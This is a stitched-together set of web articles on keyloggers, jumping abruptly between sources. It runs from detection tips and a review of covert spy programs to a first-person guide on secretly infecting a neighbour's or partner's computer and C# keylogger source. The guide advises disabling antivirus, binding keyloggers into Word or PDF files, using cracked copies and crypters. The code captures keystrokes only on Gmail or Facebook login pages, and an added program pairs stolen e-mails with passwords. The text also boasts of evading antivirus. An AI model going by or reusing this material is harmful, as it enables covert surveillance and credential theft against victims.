Keyboard logging and keyloggers. How to protect yourself from keyloggers

How to look for keyloggers

No matter how cunning keyloggers are, they can still be detected. There are several ways.

  • Search by signatures

This method allows you to determine the presence of keyloggers accurately; with the right choice of signatures, the probability of error can be reduced to zero. But a signature scanner can only detect objects that are already known and described in its database, so the database must be large and constantly updated.


  • Heuristic algorithms

This method finds a keylogger by its characteristic features and allows you to detect standard keyboard traps (hooks). Studies have shown that hundreds of safe programs that are not keyloggers set traps to track mouse and keyboard input, for example the well-known Punto Switcher program and the software for multimedia keyboards and mice, so this method produces false positives.

  • Monitoring API functions used by spies

The method is based on intercepting a number of functions used by keyloggers, such as SetWindowsHookEx, UnhookWindowsHookEx, GetAsyncKeyState, GetKeyboardState.

  • Tracking drivers, processes and services used by the system

The method is suitable not only for tracking keyloggers. The simplest use case is to use a program like Kaspersky Inspector, which monitors the appearance of new files in the system.

How to protect yourself from keyloggers

Often, known keyloggers have already been added to the database, and therefore the protection method is the same as against any malicious software:

  • Installing an antivirus product;
  • Maintaining an up-to-date database.

It is worth noting that most antivirus programs classify keyloggers as potentially dangerous software, so you should check whether the antivirus product detects this type of program in its default settings. If not, you should adjust the settings manually to protect yourself from the most common spyware.

In general, since keyloggers are aimed at spying on confidential data, you should resort to the following methods of protection:

  • Use of one-time passwords / two-factor authentication;
  • Use of proactive defense systems, which can warn the user about the installation or activation of keylogger programs;
  • Use of a virtual keyboard, which presents the keyboard on the screen as an image and protects you from both software and hardware spies.

Finding and removing keyloggers

What are the ways to protect yourself from this scourge?

  • Any antivirus program
  • Utilities with signature and heuristic search mechanisms (for example, AVZ).
  • Utilities and programs aimed at detecting keyloggers and blocking their work. This method of protection is the most effective, since this software, as a rule, blocks almost all types of keyloggers.

It is worth noting that software aimed at catching keyloggers has two features: it is mostly paid, and a Russian-language interface is rare.

For example, the English-language free software Advanced Spyware Remover eliminates advertising programs, dialers, spyware, keyloggers, etc.

The installation is standard, you should click “Next”, it’s difficult to make a mistake. After installation, you are prompted to run the program. To scan, click “Scan Now”.

However, it is worth noting that the program has not been updated for 3 years.

In general, this program checks the system registry for keys left by malware. The utility has some additional functionality: it can display the list of programs loaded at operating system startup (“HiJack Scan→Startup“), display the list of services, show active ports, view Internet Explorer “cookies”, etc. After scanning, a window similar to this will appear:

If you prefer something more recent, you can use Spyware Terminator 2012 (though it is not free). The utility is capable of detecting and removing almost all types of malware. The built-in security system activates application and system protection and monitors utilities that interact directly with the network.

  • clipboard interception,
  • intercepting keystrokes,
  • intercepting text from windows

and much more. Anti-keylogger does not use signature databases, as it is based only on heuristic algorithms. Anti-keylogger is able to protect against targeted attacks, which are very dangerous and popular among cybercriminals. It is especially effective in the fight against keyloggers based on the use of traps, cyclic polling and a keyboard filter driver.

Anti-keylogger has a free option, limited by time of use - 10 working sessions, each lasting 2 hours, which is quite enough to check your PC at a time.

So, what do we have:

  1. Keyloggers are marketed as legitimate software, but many of them can be used to steal users' personal information.
  2. Today, keyloggers, along with phishing, etc., have become one of the main methods of electronic fraud.
  3. There has been an increase in the number of malware with keylogger functionality.
  4. Distribution of software keyloggers based on rootkit technologies, which makes them invisible to the user and anti-virus scanners.
  5. Detecting espionage using keyloggers requires the use of specialized security tools.
  6. The need for multi-level protection (anti-virus products with the function of detecting dangerous software, proactive protection tools, virtual keyboard).


Various spyware programs are needed in conditions where many people have access to one computer.

In these circumstances, the user may want to know which sites were visited from his computer (for example, by children), whether credit cards were stolen using saved passwords, etc. To clarify these issues, it will be necessary.

Our review will allow you to make the best choice.

Features of choice

What exactly is a keylogger? This is a program that, strictly speaking, is not directly related to the keyboard.

It is installed in the computer's memory and acts on. Often, signs of its activity are not visible on the computer unless you specifically look for them.

Such a program interacts indirectly with the keyboard, that is, it works with a program on the PC that converts the signals received by the processor as a result of pressing buttons into text when printing.

That is, the action of such software is aimed at collecting information entered through the keyboard.

There are different types of such utilities: with some you can view all the text typed on the keyboard, with others only what was typed in the browser or in a selected application.

Some programs provide the ability to configure such indicators, others do not.

They also differ from each other in the degree of secrecy. For example, the activity of some is obvious, a shortcut remains on the Desktop, etc., such programs are suitable for monitoring the activities of, for example, children.

Traces of the presence and activity of others are not noticeable at all - they act hidden and are suitable for installation on someone else’s computer, when the fact of installation needs to be hidden from a third-party user.

Given such diversity, choosing the most suitable software can be quite difficult.

This material presents a TOP of the best programs that can be used for this purpose. It is easier to choose the right one among them.

Specifications

To simplify the software selection process, the table below shows the main comparative characteristics of all programs included in the TOP.

Name                               | License type | Type of information collected      | Functionality         | Design
-----------------------------------|--------------|------------------------------------|-----------------------|----------------------------
SC-KeyLog                          | Free         | All                                | Wide                  | Simplified
WideStep Handy Keylogger           | Free/Paid    | All                                | Wide                  | Improved
Actual Spy                         | Paid         | All                                | Very wide             | Standard
EliteKeylogger                     | Paid         | All                                | Wide                  | Standard
The Rat!                           | Free/Paid    | Less than previous                 | Quite wide            | Unaesthetic
SPYGO                              | Free         | Depending on version               | Depending on version  | Standard Windows appearance
Ardamax Keylogger 2.9              | Free         | From the keyboard                  | Narrowed              | Simplified
NS Keylogger Personal Monitor 3.8  | Free         | All                                | Narrowed              | Simplified
KGB Spy                            | Paid         | From the keyboard + open programs  | Narrow                | Simple
Golden Keylogger 1.32              | Free         | From the keyboard                  | Very narrow           | Simple

Based on the characteristics from this table, it is easy to choose the program that best suits your specific requirements.

These utilities are described in more detail below.

SC-KeyLog

This is a voluminous and functional spy program that is distributed free of charge.

In addition to specifically tracking information entered from the keyboard, it is also able to collect addresses of visited sites, passwords, open windows in the browser.

Gives full information about all actions performed on the computer. In this case, the generated file can be viewed remotely from another device.

Pros:

  • Possibility of remote access to the file from another device;
  • No traces of program activity on the computer with the correct settings;
  • Variety of collected data: information about almost all actions on the PC can be accessed.

Cons:

  • Saves passwords only up to NT0;
  • Too simple a menu and unaesthetic design;
  • A rather inconvenient format for displaying the result.

What do users who actively use this software say? “Absolutely invisible to the user”, “Data arrives regularly by email.”

WideStep Handy Keylogger

This application is distributed free of charge. The full paid version costs $35.

Quite an interesting and functional program that is worth the money if you are willing to pay it.

Its distinctive feature is the ability to send recorded data at a specified frequency. Otherwise it works fine, often more stably than other programs on this list.

Pros:

  • Collection of various types of information;
  • Complete invisibility of its work on the user’s computer;
  • Simple interface and controls.

Cons:

  • The design is better than the previous program, but still not great;
  • The result display format is inconvenient;
  • The paid version is quite expensive.

Users' opinions about this software are as follows: “Convenient, simple and functional program. Quite invisible when working.”

Actual Spy

A functional and sophisticated paid program costing 600 rubles. However, it has a free demo version.

A distinctive feature of this software is its ability in a given period of time.

This helps solve the problem of entering a graphic password/key, which has lately become widespread.

Pros:

  • Many types of information collected, plus the ability to take screenshots during a specified period;
  • A large number of other additional functions and features;
  • Records not only actions, but also the time they were performed;
  • Encrypts the generated log.

Cons:

  • The duration of work (collection of information) in the free demo version is 40 minutes;
  • Paid distribution, although at a more or less reasonable price;
  • The program is quite large.

User reviews about this application are: “The program is excellent. Well done programmers!”

EliteKeylogger

A paid program with a rather high price of 69 dollars. It operates on the PC in a low-level mode, making it almost completely undetectable.

An interesting and convenient feature is the automatic launch of the software, which occurs together with the launch of the system itself.

It is difficult to detect or not detected at all even by special anti-keyloggers.

Pros:

  • Completely hidden action, difficult to detect;
  • Low-level, driver-type operation and automatic startup when the system boots;
  • Tracks presses of not only the main keys, but also the service keys on the keyboard.

Cons:

  • A rather complex system for installing the program on a PC;
  • The program is expensive, but you can find an old hacked version on the Russian Internet;
  • A rather complex system of individual program settings, which, however, justifies itself.

What do users say about this software? “Good program”, “A little short of Jetlogger.”

The Rat!

Quite a common and popular, functional utility with a paid license.

However, for private use, a free demo version is provided for a limited period.

The program is very simple; any advanced user could write the same. However, it is completely undetectable by antiviruses and by special programs for detecting such software.

Pros:

  • Simplicity, functionality and high stability;
  • Minimal file size and space occupied on the computer;
  • Quite a lot of settings.

Cons:

  • A rather unpleasant design, made in black, white and red;
  • The functionality is somewhat narrower than in the programs described before;
  • Inconvenient viewing of the log and a generally inconvenient interface.

Users say the following about this program: “It works stably, but is a bit simple,” “The program is good, it allows you to collect data unnoticed.”

SPYGO

This is a fundamentally new keylogger, designed to work on and developed by a Russian programmer.

A keyboard spy is a program that reads the keys pressed and saves them to a file. Later, you can view what the person wrote at the computer, what messages they typed and what passwords they entered. Another name for a keyboard spy is keylogger, from the English “keylogger”, which literally means “key recorder”.

In the NeoSpy program, the keylogger function is enabled by default; in this mode, the program records text, hotkey combinations and passwords typed on the keyboard. The keylogger settings are located in the menu "Tracking Settings" - "Log Recording" - "Keyboard". You can choose one of two operating modes of the program: standard and alternative. It is recommended to use the standard option in 99% of cases, but in case of a conflict with your antivirus software you can enable the alternative mode.

Setting up a keylogger


The keyboard log is always recorded in full format, including service keys. An example of such a log can be seen in the illustration. While viewing the report, you can turn off the display of non-printing characters and view the log as plain text, which is easier to read.


Keylogger example

To make working with reports easier, typed passwords are highlighted in the list of keystrokes. This way you can find out your child’s passwords and, if necessary, protect him from unwanted acquaintances. If the NeoSpy program is used at an enterprise to monitor employees, then the collection of personal data and correspondence is prohibited by the legislation of most countries, so this option must be disabled, or the employee must be notified in writing about control by management and the inadmissibility of using a computer in the organization for personal correspondence.

Who among us hasn’t wanted to feel like a cool hacker at least once and break at least something? :) Even if not, everyone has thought at least once about how great it would be to get the password to the mail or social network account of a friend, wife/husband or roommate. :) And you have to start somewhere, after all! A significant part of attacks (hacking) involves infecting the victim’s computer with so-called keyloggers (spyware).

So, in today’s article we’ll talk about what free programs exist for monitoring Windows-based computers, where you can download their full versions, how to infect a victim’s computer with them, and what the features of their use are.

But first, a little introduction.

What are keyloggers and why are they needed?

I think you have already guessed what it is. As a rule, it is a program that is installed (usually hidden, although not always) on the victim’s computer, after which it records absolutely all keystrokes on this machine. Moreover, in addition to the keystrokes themselves, the following is usually recorded: the date and time of the keystroke (action) and the program in which these actions were performed (the browser, including the website address (hurray, we immediately see what the passwords are for!); a local application; system services (including Windows login passwords), etc.).

From here one of the problems is immediately visible: I got access to my neighbor’s computer for a couple of minutes and I want to get her password from VK! I installed the miracle program and returned the computer. How can I look up passwords later? Looking for a way to take the computer from her again? The good news is: usually not. Most keyloggers are capable of not only storing the entire accumulated database of actions locally, but also sending it remotely. There are many options for sending logs:

  • A fixed e-mail (there may be several) is the most convenient option;
  • FTP server (who has it);
  • SMB server (exotic, and not very convenient).
  • A fixed flash drive (you insert it into the USB port of the victim’s computer, and all logs are copied there automatically in invisible mode!).

Why is all this needed? I think the answer is obvious. In addition to the banal stealing of passwords, some keyloggers can do a number of other nice things:

  • Logging correspondence in specified social networks or instant messengers (for example, Skype).
  • Taking screenshots of the screen.
  • View/capture webcam data (which can be very interesting).

How to use keyloggers?

And this is a difficult question. You need to understand that just finding a convenient, functional, good keylogger is not enough.

So, what is needed for a spy program to work successfully?:

  • Administrator access to a remote computer.
    Moreover, this does not necessarily mean physical access. You can easily access it via RDP (Remote Desktop Service); TeamViewer; AmmyAdmin, etc.
    As a rule, the greatest difficulties are associated with this point. However, I recently wrote an article about how to get administrator rights in Windows.
  • Anonymous e-mail / ftp (by which you will not be identified).
    Of course, if you are breaking Aunt Shura for your neighbor, this point can be safely omitted. As is the case if you always have the victim’s computer at hand (ala, find out your brother/sister’s passwords).
  • Absence of working antiviruses / internal Windows protection systems.
    Most public keyloggers (which will be discussed below) are known to the vast majority of antivirus software (although there are logger viruses built into the OS kernel or a system driver, and antiviruses can no longer detect or destroy them, even if they have detected them). Because of this, anti-virus software, if any, will have to be mercilessly destroyed. In addition to antiviruses, there are systems like Windows Defender (present from Windows 7 onwards). They detect suspicious activity in software running on a computer. You can easily find information on how to get rid of them on Google.

These, perhaps, are all the necessary and sufficient conditions for your success in the field of stealing other people’s passwords / correspondence / photos or whatever else you want to encroach on.

What types of spyware are there and where can I download them?

So, let's begin the review of the main keyloggers that I have used in my daily practice, with links to download their full versions for free (i.e. all versions are the latest at the moment for which it is possible to find a cure, and with already working and tested cracks).

0. The Rat!

Ratings (out of 10):

  • Stealth: 10
  • Convenience/usability: 9
  • Functionality: 8

It's just a bomb, not a keylogger! In working condition it takes 15-20 KB. Why be surprised: it is written entirely in assembly language (veteran programmers shed tears) and written mostly by enthusiastic hackers, due to which the level of its secrecy is simply amazing: it works at the OS kernel level!

In addition, the package includes FileConnector - a mini-program that allows you to connect this keylogger with absolutely any program. As a result, you get a new exe of almost the same size, and when launched, it works exactly like the program with which you glued it together! But after the first launch, your keylogger will be automatically installed in invisible mode with the parameters for sending logs that you have previously specified. Convenient, isn't it?

Great opportunity for social engineering(bring a game file/presentation to a friend on a flash drive, or even just a Word document (I’ll tell you how to create an exe file that launches a specific word/excel file in one of my next articles), launch it, everything is good and wonderful, however, the friend is already invisibly infected!). Or you simply send this file to a friend by mail (preferably a link to download it, since modern mail servers prohibit sending exe files). Of course, there is still a risk from antiviruses during installation (but it will not exist after installation).

By the way, using some other techniques you can glue any distribution together hidden installation(these are available in The Rat! and Elite keylogger) not only with exe files (which still raise suspicion among more or less advanced users), but also with ordinary word / excel and even pdf files! No one will ever think anything about a simple pdf, but that’s not the case! :) How this is done is the topic of a whole separate article. Those who are especially zealous can write me questions through the feedback form. ;)

Overall, The Rat! can be described for a very long time and a lot. This was done much better than me. There is also a download link there.

1. Elite keylogger

Ratings (out of 10):

  • Stealth: 10
  • Convenience/usability: 9
  • Functionality: 8

Perhaps one of the best keyloggers ever created. Its capabilities, in addition to the standard set (interception of all keystrokes in the context of applications / windows / sites), include interception of instant messenger messages, pictures from a webcam, and also - which is VERY important! - interception of WinLogon service passwords. In other words, it intercepts Windows login passwords (including domain ones!). This became possible thanks to its work at the system driver level and its launch even at the OS boot stage. Due to this same feature, this program remains completely invisible to both Kaspersky and all other anti-malware software. Frankly, I have not met a single other keylogger capable of this.

However, you shouldn’t delude yourself too much. The installer itself is recognized by antiviruses very easily and to install it you will need administrator rights and disabling all antivirus services. After installation, everything will work perfectly in any case.

In addition, the described feature (working at the OS kernel level) introduces requirements for the OS version on which the keylogger will work. Versions 5-5.3 (links to which are given below) support everything up to and including Windows 7. Win 8/10, as well as the Windows Server family (2003 / 2008 / 2012), are no longer supported. There is version 6, which functions perfectly, including on Win 8 and 10, but it is currently not possible to find a cracked version. It will probably appear in the future. In the meantime, you can download Elite keylogger 5.3 from the link above.

There is no network operation mode, therefore it is not suitable for use by employers (to monitor the computers of their employees) or an entire group of people.

An important point is the ability to create an installation distribution with predefined settings (for example, with a specified email address where logs will need to be sent). At the same time, at the end you get a distribution kit that, when launched, does not display absolutely any warnings or windows, and after installation it can even destroy itself (if you check the appropriate option).

Several screenshots of version 5 (to show how beautiful and convenient everything is):

2. All-in-one keylogger.

Ratings (out of 10):

  • Stealth: 3
  • Convenience/usability: 9
  • Functionality: 8

It is also a very, very convenient thing. The functionality is quite at the level of Elite keylogger. Things are worse with secrecy. Winlogon passwords are no longer intercepted; it is not a driver and is not built into the kernel. However, it is installed in system and hidden AppData directories, which are not so easy for unauthorized users (those other than the one on whose behalf it was installed) to reach. Nevertheless, antiviruses sooner or later find it, which makes this thing not particularly reliable and safe when used, for example, at work to spy on your own superiors. ;) Gluing it to something or encrypting the code to hide it from antiviruses will not work.

Works on any version of Win OS (which is nice and practical).

As for the rest, everything is fine: it logs everything (except Windows login passwords), sends it anywhere (including e-mail, ftp, fixed flash drive). In terms of convenience, everything is also excellent.

3. Spytech SpyAgent.

Ratings (out of 10):

  • Stealth: 4
  • Convenience/usability: 8
  • Functionality: 10

Also a good keylogger, although with dubious secrecy. Supported OS versions are also all possible. The functionality is similar to previous options. There is an interesting self-destruct function after a specified period of time (or upon reaching a predetermined date).

In addition, it is possible to record video from a webcam and sound from a microphone, which can also be very popular and which the previous two representatives do not have.

There is a network mode of operation, which is convenient for monitoring an entire network of computers. By the way, StaffCop has it too (it is not included in the review due to its uselessness for a single private user). Perhaps this program is ideal for employers to spy on their employees (although the leaders in this field are unconditionally StaffCop and LanAgent; if you are a legal entity, be sure to look in their direction). Or to keep track of your offspring who love to sit and watch “adult sites”. That is, where what is needed is not concealment, but convenience (including a bunch of beautiful log reports, etc.) and functionality for blocking specified sites/programs (SpyAgent also has it).

4. Spyrix Personal monitor.

Ratings (out of 10):

  • Stealth: 4
  • Convenience/usability: 6
  • Functionality: 10

The functionality is at the level of the previous candidate, but the same problems with secrecy. In addition, the functionality includes an interesting thing: copying files from USB drives inserted into the computer, as well as remote viewing of logs through a web account on the Spyrix website (but we are going to download a cracked version, so it will not work for us).

5. Spyrix Personal monitor.

Ratings (out of 10):

  • Stealth: 3
  • Convenience/usability: 6
  • Functionality: 8

I won’t describe it in detail, because... this copy does not have anything that one of the previous spies did not have, however, someone may like this keylogger (at least for its interface).

What do we end up with?

The issue of using a keylogger is more ethical than technical, and it greatly depends on your goals.

If you are an employer who wants to control his employees, feel free to set up StaffCop, collect written permission from all employees for such actions (otherwise you may be seriously charged for such things) and the job is in the bag. Although I personally know more effective ways of increasing the performance of employees.

If you are a novice IT specialist who just wants to experience what it’s like to break someone - and how this thing works in general, then arm yourself with social engineering methods and conduct tests on your friends, using any of the examples given. However, remember: the detection of such activity by victims does not contribute to friendship and longevity. ;) And you definitely shouldn’t test this at your work. Mark my words: I have experience with this. ;)

If your goal is to spy on your friend, husband, neighbor, or maybe you even do it regularly and for money, think carefully about whether it’s worth it. After all, sooner or later you may be held liable. And it’s not worth it: “rummaging through someone else’s dirty laundry is not a pleasant pleasure.” If you still need to (or maybe you work in the field of investigating computer crimes and such tasks are part of your professional responsibilities), then there are only two options: The Rat! and Elite Keylogger. In the mode of hidden installation distributions, glued with word / excel / pdf. And it’s better, if possible, encrypted with a fresh cryptor. Only in this case can we speak of safer activities and real success.

But in any case, it is worth remembering that the competent use of keyloggers is only one small link in achieving the goal (including even a simple attack). You don’t always have admin rights, you don’t always have physical access, and not all users will open, read, and even more so download your attachments/links (hello social engineering), the antivirus won’t always be disabled/your keylogger/cryptor won’t always be unknown to them . All these and many untold problems can be solved, but their solution is the topic of a whole series of separate articles.

In a word, you have just begun to plunge into the complex, dangerous, but insanely interesting world of information security. :)

Sincerely, Lysyak A.S.

The hacker world can be divided into three groups of attackers:


1) “Skids” (script kiddies) – little novice hackers who collect well-known pieces of code and utilities and use them to create some simple malware.


2) “Buyers” are unscrupulous entrepreneurs, teenagers and other thrill-seekers. They buy services for writing such software on the Internet, collect various private information with its help, and possibly resell it.


3) “Black Hat Coders” - programming gurus and architecture experts. They write code in a notepad and develop new exploits from scratch.


Can someone with good programming skills become the last one? I don't think you'll start creating something like regin (link) after attending a few DEFCON sessions. On the other hand, I believe that an information security officer should master some of the concepts on which malware is built.


Why do information security personnel need these dubious skills?


Know your enemy. As we discussed on the Inside Out blog, you need to think like the offender to stop him. I am an information security specialist at Varonis and in my experience, you will be stronger in this craft if you understand what moves an attacker will make. So I decided to start a series of posts about the details that go behind malware and the different families of hacking tools. Once you realize how easy it is to create undetectable software, you may want to reconsider your enterprise's security policies. Now in more detail.


For this informal "hacking 101" class, you need some programming knowledge (C# and Java) and a basic understanding of Windows architecture. Keep in mind that in reality malware is written in C/C++/Delphi so as not to depend on frameworks.


Keylogger


A keylogger is software or some kind of physical device that can intercept and remember keystrokes on a compromised machine. This can be thought of as a digital trap for every keystroke on a keyboard.
Often this function is implemented inside other, more complex software, for example Trojans (Remote Access Trojans, RATs), which ensure the delivery of intercepted data back to the attacker. There are also hardware keyloggers, but they are less common because they require direct physical access to the machine.


However, creating basic keylogger functions is fairly easy to program. WARNING. If you want to try any of the following, make sure you have the permissions and are not disrupting the existing environment, and it's best to do it all on an isolated VM. Further, this code won't be optimized, I'll just show you lines of code that can accomplish the task, it's not the most elegant or optimal way. And finally, I will not tell you how to make a keylogger resistant to reboots or try to make it completely undetectable using special programming techniques, as well as protection from deletion even if it is detected.



To connect to the keyboard you just need to use 2 lines in C#:


    // P/Invoke declaration for the Win32 function in user32.dll (System.Runtime.InteropServices)
    [DllImport("user32.dll")]
    public static extern int GetAsyncKeyState(Int32 i);

You can learn more about the GetAsyncKeyState function on MSDN.


In short: the function reports whether a key is up or down at the moment of the call, and whether it has been pressed since the previous call. Now we call this function continuously to read the keyboard:


    while (true)
    {
        Thread.Sleep(100);
        for (int i = 0; i < 255; i++)
        {
            int state = GetAsyncKeyState(i);
            // 1 = pressed and released since the last poll; -32767 (0x8001 as a signed
            // 16-bit value) = still held down and pressed since the last poll
            if (state == 1 || state == -32767)
            {
                Console.WriteLine((Keys)i);   // Keys is System.Windows.Forms.Keys
            }
        }
    }

What's going on here? The loop polls every virtual-key code every 100 ms. A return value of 1 means the key was pressed and released between two polls; -32767 (0x8001 as a signed 16-bit value) means it is still held down and was pressed since the last poll. In both cases the name of the key from the Keys enum (for example A, Return or LShiftKey, not the typed character) is written to the console. In real life this data is buffered and sent to the attacker. Two caveats: the "pressed since last call" bit is cleared by whichever process calls GetAsyncKeyState first, so another poller on the same machine can steal keystrokes from this loop, and a key that is merely held down is reported once, not repeated.


Smart keylogger

Is there any point in capturing everything typed into every application?
The code above pulls raw keyboard input from whatever window and input field currently has focus. If the goal is credit card numbers and passwords, this approach is not very efficient. In real-world scenarios, where such keyloggers run on hundreds or thousands of machines, parsing the collected data can take so long that the information is stale and worthless by the time it is found.


Let's assume that I want to get my hands on Facebook or Gmail credentials to sell likes. Then a new idea: activate keylogging only when a browser window is active and the word Gmail or Facebook is in the page title. This method increases the chances of obtaining credentials.


Second version of the code:


    // class-level declarations
    [DllImport("user32.dll")]
    static extern IntPtr GetForegroundWindow();

    [DllImport("user32.dll", CharSet = CharSet.Unicode)]
    static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);

    // inside the main loop
    const int chars = 256;
    StringBuilder buff = new StringBuilder(chars);

    while (true)
    {
        IntPtr handle = GetForegroundWindow();
        if (GetWindowText(handle, buff, chars) > 0)
        {
            string line = buff.ToString();
            if (line.Contains("Gmail") || line.Contains("Facebook - Log In or Sign Up"))
            {
                // keyboard check (the polling loop from the first version goes here)
            }
        }
        Thread.Sleep(100);
    }

This snippet determines the active window every 100 ms using the GetForegroundWindow function (see MSDN) and copies its title into buff with GetWindowText. For a browser the window title is the page title, so if it contains Gmail or the Facebook login title, the keyboard-scanning fragment is called.


This way the keyboard is scanned only while a browser window showing the Facebook or Gmail login page is in the foreground. Note that the check is a plain substring match on the title: it is case-sensitive and tied to the exact title the site uses at the time, so the attacker has to keep the list current when sites change their titles.


An even smarter keylogger


Let's assume that the attacker was able to obtain data using code similar to ours, and that he is ambitious enough to infect tens or hundreds of thousands of machines. The result is a huge file with gigabytes of text in which the useful information still has to be found. This is where regular expressions (regex) come in: a kind of mini-language for describing text patterns and scanning text for matches. You can find out more here.


To keep it simple, here are ready-made expressions that match e-mail addresses (used as login names) and passwords:


    // Looking for an e-mail address
    ^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$

    // Looking for a password: at least 6 characters, with at least one digit and one letter
    (?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])

These expressions are here as a hint of what can be done with them. With regular expressions you can search for (and find!) anything that has a fixed, well-defined format: passport numbers, credit card numbers, account numbers and even passwords.
Admittedly, regular expressions are not the most readable kind of code, but they are one of a programmer's best friends when it comes to text parsing. Java, C#, JavaScript and other popular languages already have built-in functions that accept regular expressions.


For C# it looks like this:


    using System.Text.RegularExpressions;

    Regex re = new Regex(@"^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$");
    Regex re2 = new Regex(@"(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])");
    string email = "[email protected]";
    string pass = "abcde3FG";
    Match result = re.Match(email);
    Match result2 = re2.Match(pass);

Here the first expression (re) matches an e-mail address and the second (re2) matches any string of at least 6 characters that contains at least one digit and at least one letter. Keep in mind how loose the second pattern is: it also matches ordinary words followed by a number, so on its own it mostly serves to discard short or all-letter lines.
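The parsing step described in this section (sifting a large capture for login and password pairs), as an added example that is not part of the original post. It uses the two patterns above unchanged and adds the one piece of context the regexes cannot supply: a candidate password is only reported when it is the line typed immediately after an address, since the password pattern alone matches almost any line containing a letter and a digit. The capture lines are constructed for this example, the class and method names are my own, and the capture is assumed to have one line per Enter key, as the polling loop would buffer it.

```csharp
// Added example, not the original post's code: pairs addresses with the line typed
// right after them in a keystroke capture, using the two regexes from the text.
using System;
using System.Collections.Generic;
using System.Text.RegularExpressions;

static class CaptureParser
{
    // The two patterns from the text (quantifier braces and character classes intact)
    static readonly Regex EmailRe = new Regex(
        @"^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$");
    static readonly Regex PasswordRe = new Regex(@"(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])");

    // Walks the capture one line per Enter key and pairs every address with the
    // password-like line typed immediately after it. Anything else between the two
    // (another field, a stray line) breaks the pair, which stops the very permissive
    // password pattern from matching random text on its own.
    public static List<KeyValuePair<string, string>> FindCredentials(IEnumerable<string> lines)
    {
        var found = new List<KeyValuePair<string, string>>();
        string pendingEmail = null;
        foreach (string raw in lines)
        {
            string line = raw.Trim();
            if (EmailRe.IsMatch(line))
            {
                pendingEmail = line;   // login field; the next line is probably the password
                continue;
            }
            if (pendingEmail != null && PasswordRe.IsMatch(line))
                found.Add(new KeyValuePair<string, string>(pendingEmail, line));
            pendingEmail = null;       // a pair is only ever two consecutive lines
        }
        return found;
    }

    static void Main()
    {
        // Constructed sample capture for this example, not real data
        string[] captured =
        {
            "hello world",
            "test.user@example.com",
            "Sup3rSecret",
            "admin@10.0.0.5",   // IP-address domain: matched by the second branch of EmailRe
            "letmein",          // no digit: fails the password pattern, so this address yields no pair
            "abc",
        };

        foreach (var cred in FindCredentials(captured))
            Console.WriteLine($"{cred.Key} : {cred.Value}");
    }
}
```

Only the first address in the sample ends up paired, because "letmein" has no digit and so fails the password pattern. That is the trade-off of this approach: the pairing rule throws away real credentials that do not fit the pattern, while the pattern by itself would flood the attacker with false positives, which is why in practice the window-title filter from the previous section does more of the work than the regex.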


Free and completely undetectable


In my example I used Visual Studio (use whatever environment you like) to create such a keylogger in 30 minutes.
If I were a real attacker I would aim at some real target (banking sites, social networks and so on) and adapt the code to those targets. I would also, of course, launch an e-mail phishing campaign carrying the program disguised as an ordinary invoice or some other attachment.


One question remains: will such software really be undetectable by security programs?


I compiled my code and checked the exe file on the VirusTotal website. This is a web service that runs an uploaded file through dozens of antivirus engines and also looks up its hash among previously submitted samples. Surprise! Naturally nothing was found.



This is the main point. You can always change the code and keep developing it, staying a few steps ahead of signature scanners, which only recognise what is already in their databases. If you are able to write your own code it is almost guaranteed to pass a signature scan; what can still catch it is its behaviour, such as a process that polls GetAsyncKeyState in a tight loop. You can read the full analysis on this page.


The main purpose of this article is to show that antivirus alone will not fully secure your enterprise. A deeper assessment of the actions of all users, and even of services, is needed to spot potentially malicious activity.


In the next article I will show how to make a truly undetectable version of such software.